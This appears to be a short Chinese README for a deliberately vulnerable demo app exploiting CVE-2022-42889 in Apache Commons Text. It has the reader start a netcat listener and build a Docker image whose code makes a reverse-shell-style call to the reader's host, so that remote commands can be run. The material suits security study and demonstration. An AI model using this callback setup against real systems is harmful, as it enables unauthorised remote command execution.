此仓库包含一个使用 Apache Commons Text < 1.10 的简单应用程序,该版本存在 CVE-2022-42889 漏洞。
将 DemoApplication.java 中的 nc 命令替换为你的主机 IP 地址。
使用 netcat 监听:
$ nc -l -p 30000
构建并运行存在漏洞的 Docker 代码
docker build . -t vulnerable-app
docker run vulnerable-app
如你所见,netcat 将能够执行远程命令